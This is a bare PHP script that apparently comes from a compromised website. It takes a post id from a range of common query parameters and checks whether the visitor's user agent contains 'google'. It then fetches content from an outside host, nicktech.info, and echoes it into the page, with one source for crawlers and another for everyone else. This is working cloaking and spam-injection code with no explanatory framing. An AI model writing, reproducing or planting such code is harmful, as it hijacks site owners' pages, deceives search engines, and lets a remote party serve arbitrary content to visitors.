<?php
$v_id=$_GET['p'];
if($v_id == '')
{
$v_id=$_GET['pid'];
}
if($v_id == '')
{
$v_id=$_GET['id'];
}
if($v_id == '')
{
$v_id=$_GET['blogid'];
}
if($v_id == '')
{
$v_id=$_GET['post'];
}
if($v_id == '')
{
$v_id=$_GET['page'];
}
if($v_id == '')
{
$v_id=$_GET['postid'];
}
if($v_id == '')
{
$v_id=$_GET['mid'];
}
if($v_id == '')
{
$v_id=$_GET['uid'];
}



$user_agent_str=$_SERVER["HTTP_USER_AGENT"];
if (stristr($user_agent_str,'google')) {
$ua_ret='1';
}
if($ua_ret == '1'){

if($v_id=='')
{
  $content_text = '';
}
else
{
  $v_url = 'http://www.nicktech.info/codes/pages.php?p='.$v_id;
  $content_text = file_get_contents($v_url);
}
	echo $content_text;
}
else
{
  $v_url = 'http://www.nicktech.info/codes/urls2.php?p='.$v_id;
  $content_text = file_get_contents($v_url);
	echo $content_text;
}
?>
